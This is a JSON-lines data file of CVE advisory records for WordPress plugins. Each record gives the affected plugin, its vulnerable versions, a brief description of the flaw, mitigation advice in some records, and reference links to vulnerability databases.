{"CVE_ID":"CVE-2022-4118","slug":"woo-altcoin-payment-gateway","versionImpact":"1.7.1","description":"The Bitcoin \/ AltCoin Payment Gateway for WooCommerce & Multivendor store \/ shop WordPress plugin through 1.7.1 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by authenticated users","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2839ff82-7d37-4392-8fa3-d490680d42c4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2839ff82-7d37-4392-8fa3-d490680d42c4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2892","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_bulk_delete_product function. This makes it possible for unauthenticated attackers to bulk delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b36e94e4-b1e8-4803-9377-c4d710b029de?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b36e94e4-b1e8-4803-9377-c4d710b029de?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4948","slug":"woocommerce-cvr-payment-gateway","description":"The WooCommerce CVR Payment Gateway plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the refresh_order_cvr_data AJAX action in versions up to 6.1.0. This makes it possible for authenticated attackers with contributor-level access and above, to update CVR numbers for orders.","refs":"[{\"url\":\"https:\\\/\\\/plugins.yanco.dk\\\/product\\\/woocommerce-cvr-payment-gateway\\\/\",\"name\":\"https:\\\/\\\/plugins.yanco.dk\\\/product\\\/woocommerce-cvr-payment-gateway\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f72ba0e2-a9c4-43b0-a01f-185554090162?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f72ba0e2-a9c4-43b0-a01f-185554090162?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50824","slug":"insert-or-embed-articulate-content-into-wordpress","versionImpact":"4.3000000021","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Brian Batt Insert or Embed Articulate Content into WordPress allows Stored XSS.This issue affects Insert or Embed Articulate Content into WordPress: from n\/a through 4.3000000021.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/insert-or-embed-articulate-content-into-wordpress\\\/wordpress-insert-or-embed-articulate-content-into-wordpress-plugin-4-3000000021-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/insert-or-embed-articulate-content-into-wordpress\\\/wordpress-insert-or-embed-articulate-content-into-wordpress-plugin-4-3000000021-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4856","slug":"fs-product-inquiry","versionImpact":"1.1.1","description":"The FS Product Inquiry WordPress plugin through 1.1.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin or unauthenticated users","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cf90a27-55e2-4b2c-9df1-5fa34c1bd9d1\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6cf90a27-55e2-4b2c-9df1-5fa34c1bd9d1\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2090","slug":"remote-content-shortcode","versionImpact":"1.5","description":"The Remote Content Shortcode plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.5 via the remote_content shortcode. This makes it possible for authenticated attackers, with contributor-level access and above, to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec93f360-2eed-4858-b36f-8cc17f7b4ac1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ec93f360-2eed-4858-b36f-8cc17f7b4ac1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/remote-content-shortcode\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/remote-content-shortcode\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12122","slug":"resads","versionImpact":"2.0.6","description":"The ResAds plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via multiple parameters in all versions up to, and including, 2.0.6 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/resads\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/resads\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0a544a-b5f3-41bf-9313-28188662ea56?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1c0a544a-b5f3-41bf-9313-28188662ea56?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13746","slug":"booking-calendar-and-notification","versionImpact":"4.0.3","description":"The Booking Calendar and Notification plugin for WordPress is vulnerable to unauthorized access, modification, and loss of data due to missing capability checks on the wpcb_all_bookings(), wpcb_update_booking_post(), and wpcb_delete_posts() functions in all versions up to, and including, 4.0.3. This makes it possible for unauthenticated attackers to extract data, create or update bookings, or delete arbitrary posts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/tags\\\/4.0.3\\\/lib\\\/includes\\\/function.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/tags\\\/4.0.3\\\/lib\\\/includes\\\/function.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L134\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L188\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L188\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L270\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/booking-calendar-and-notification\\\/trunk\\\/lib\\\/classes\\\/api.php#L270\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/422bb9a5-c848-4492-add7-bc65b1111565?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/422bb9a5-c848-4492-add7-bc65b1111565?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11283","slug":"wp-jobhunt","versionImpact":"7.1","description":"The WP JobHunt plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 7.1. This is due to wp_ajax_google_api_login_callback function not properly verifying a user's identity prior to authenticating them. This makes it possible for unauthenticated attackers to access arbitrary candidate accounts.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/jobcareer-job-board-responsive-wordpress-theme\\\/14221636\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfa487fb-c014-47f1-9537-73881ede30b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfa487fb-c014-47f1-9537-73881ede30b4?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3433","slug":"advanced-advertising-system","versionImpact":"1.3.1","description":"The Advanced Advertising System plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.3.1. This is due to insufficient validation on the redirect url supplied via the 'redir' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-advertising-system\\\/trunk\\\/shortcode.php#L165\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/advanced-advertising-system\\\/trunk\\\/shortcode.php#L165\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72a56589-9dc0-47a7-bb68-e31f84a639ee?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72a56589-9dc0-47a7-bb68-e31f84a639ee?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4104","slug":"frontend-dashboard","description":"The Frontend Dashboard plugin for WordPress is vulnerable to Privilege Escalation due to a missing capability check on the fed_wp_ajax_fed_login_form_post() function in versions 1.0 to 2.2.6. This makes it possible for unauthenticated attackers to reset the administrator\u2019s email and password, and elevate their privileges to that of an administrator.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.6\\\/includes\\\/frontend\\\/request\\\/login\\\/index.php#L21\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.6\\\/includes\\\/frontend\\\/request\\\/login\\\/index.php#L21\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.6\\\/includes\\\/frontend\\\/request\\\/login\\\/register.php#L16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.6\\\/includes\\\/frontend\\\/request\\\/login\\\/register.php#L16\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/frontend\\\/request\\\/login\\\/validation.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/frontend-dashboard\\\/tags\\\/2.2.7\\\/includes\\\/frontend\\\/request\\\/login\\\/validation.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288562\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3288562\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/frontend-dashboard\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31e518a9-316b-40a4-ada7-317fb2c16766?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/31e518a9-316b-40a4-ada7-317fb2c16766?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32306","slug":"audio4-html5","versionImpact":"4.4.6","description":"Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in LambertGroup Radio Player Shoutcast & Icecast WordPress Plugin allows Blind SQL Injection. This issue affects Radio Player Shoutcast & Icecast WordPress Plugin: from n\/a through 4.4.6.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/audio4-html5\\\/vulnerability\\\/wordpress-radio-player-shoutcast-icecast-wordpress-plugin-4-4-6-sql-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/audio4-html5\\\/vulnerability\\\/wordpress-radio-player-shoutcast-icecast-wordpress-plugin-4-4-6-sql-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4553","slug":"fl3r-feelbox","versionImpact":"8.1","description":"The FL3R FeelBox WordPress plugin through 8.1 does not have CSRF check when updating reseting moods which could allow attackers to make logged in admins perform such action via a CSRF attack and delete the lydl_posts & lydl_poststimestamp DB tables","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/483ed482-a1d1-44f6-8b99-56e653d3e45f\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/483ed482-a1d1-44f6-8b99-56e653d3e45f\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2891","slug":"wp-easycart","versionImpact":"5.4.8","description":"The WP EasyCart plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 5.4.8. This is due to missing or incorrect nonce validation on the process_delete_product function. This makes it possible for unauthenticated attackers to delete products via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2917958\\\/wp-easycart\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcca7ade-8b35-4ba1-a8b4-b1e815b025e3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bcca7ade-8b35-4ba1-a8b4-b1e815b025e3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4945","slug":"woocommerce-jetpack","versionImpact":"7.1.0","description":"The Booster for WooCommerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple shortcodes in versions up to, and including, 7.1.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.0\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L1035\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/woocommerce-jetpack\\\/tags\\\/7.1.0\\\/includes\\\/shortcodes\\\/class-wcj-general-shortcodes.php#L1035\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966325\\\/woocommerce-jetpack\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2966325\\\/woocommerce-jetpack\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/981639a3-63c4-4b3f-827f-4d770bd44806?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/981639a3-63c4-4b3f-827f-4d770bd44806?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-49162","slug":"bigcommerce","versionImpact":"5.0.6","description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in BigCommerce BigCommerce For WordPress.This issue affects BigCommerce For WordPress: from n\/a through 5.0.6.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bigcommerce\\\/wordpress-bigcommerce-for-wordpress-plugin-5-0-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/bigcommerce\\\/wordpress-bigcommerce-for-wordpress-plugin-5-0-6-sensitive-data-exposure-via-log-file-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0094","slug":"upqode-google-maps","versionImpact":"1.0.5","description":"The UpQode Google Maps WordPress plugin through 1.0.5 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1453471f-164d-4487-a736-8cea086212fe\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/1453471f-164d-4487-a736-8cea086212fe\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5432","slug":"lifeline-donation","versionImpact":"1.2.6","description":"The Lifeline Donation plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.2.6. This is due to insufficient verification on the user being supplied during the checkout through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e24da0c-13d2-4a3d-b918-0d28e3341d88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2e24da0c-13d2-4a3d-b918-0d28e3341d88?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lifeline-donation\\\/trunk\\\/includes\\\/class-lifeline-donation.php?rev=2575844#L292\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lifeline-donation\\\/trunk\\\/includes\\\/class-lifeline-donation.php?rev=2575844#L292\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lifeline-donation\\\/trunk\\\/vendor\\\/webinane\\\/webinane-commerce\\\/includes\\\/Classes\\\/Checkout.php?rev=2490935#L125\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/lifeline-donation\\\/trunk\\\/vendor\\\/webinane\\\/webinane-commerce\\\/includes\\\/Classes\\\/Checkout.php?rev=2490935#L125\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12262","slug":"ebook-store","versionImpact":"5.8001","description":"The Ebook Store plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'step' parameter in all versions up to, and including, 5.8001 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ebook-store\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/ebook-store\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f8a13e3-f6f5-4673-b223-95eb11465756?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5f8a13e3-f6f5-4673-b223-95eb11465756?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12067","slug":"wp-travel","versionImpact":"10.0.0","description":"The WP Travel \u2013 Ultimate Travel Booking System, Tour Management Engine plugin for WordPress is vulnerable to SQL Injection via the 'booking_itinerary' parameter of the 'wptravel_get_booking_data' function in all versions up to, and including, 10.0.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/app\\\/inc\\\/admin\\\/class-wptravel-admin-assets.php#L17\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/app\\\/inc\\\/admin\\\/class-wptravel-admin-assets.php#L17\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/app\\\/inc\\\/admin\\\/class-wptravel-admin-assets.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/app\\\/inc\\\/admin\\\/class-wptravel-admin-assets.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/inc\\\/helpers\\\/helpers-stat.php#L14\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/inc\\\/helpers\\\/helpers-stat.php#L14\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/inc\\\/helpers\\\/helpers-stat.php#L64\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-travel\\\/trunk\\\/inc\\\/helpers\\\/helpers-stat.php#L64\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e0f38db-84bb-4ba9-9068-40937e78010d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e0f38db-84bb-4ba9-9068-40937e78010d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0822","slug":"bit-assist","versionImpact":"1.5.2","description":"Bit Assist plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 1.5.2 via the fileID Parameter. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-assist\\\/tags\\\/1.5.2\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/DownloadController.php#L65\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bit-assist\\\/tags\\\/1.5.2\\\/backend\\\/app\\\/HTTP\\\/Controllers\\\/DownloadController.php#L65\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3239816\\\/#file3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/bit-assist\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de9b0eba-5d2b-427c-a199-88bf96c26f5e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/de9b0eba-5d2b-427c-a199-88bf96c26f5e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2025","slug":"give","versionImpact":"3.22.0","description":"The GiveWP \u2013 Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the give_reports_earnings() function in all versions up to, and including, 3.22.0. This makes it possible for unauthenticated attackers to disclose sensitive information included within earnings reports.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/reports\\\/reports.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/give\\\/trunk\\\/includes\\\/admin\\\/reports\\\/reports.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252319\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3252319\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/give\\\/#description\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/give\\\/#description\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40595943-121d-4492-a0ed-f2de1bd99fda?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/40595943-121d-4492-a0ed-f2de1bd99fda?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3432","slug":"aawp-obfuscator","versionImpact":"1.0","description":"The AAWP Obfuscator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data-aawp-web' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aawp-obfuscator\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/aawp-obfuscator\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26b1b899-37a2-44fd-b961-5e6175e0417f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/26b1b899-37a2-44fd-b961-5e6175e0417f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32295","slug":"salon-booking-plugin-pro-cc","versionImpact":"10.10.2","description":"Missing Authorization vulnerability in wordpresschef Salon Booking Pro allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Salon Booking Pro: from n\/a through 10.10.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/salon-booking-plugin-pro-cc\\\/vulnerability\\\/wordpress-salon-booking-wordpress-plugin-10-10-2-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/salon-booking-plugin-pro-cc\\\/vulnerability\\\/wordpress-salon-booking-wordpress-plugin-10-10-2-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
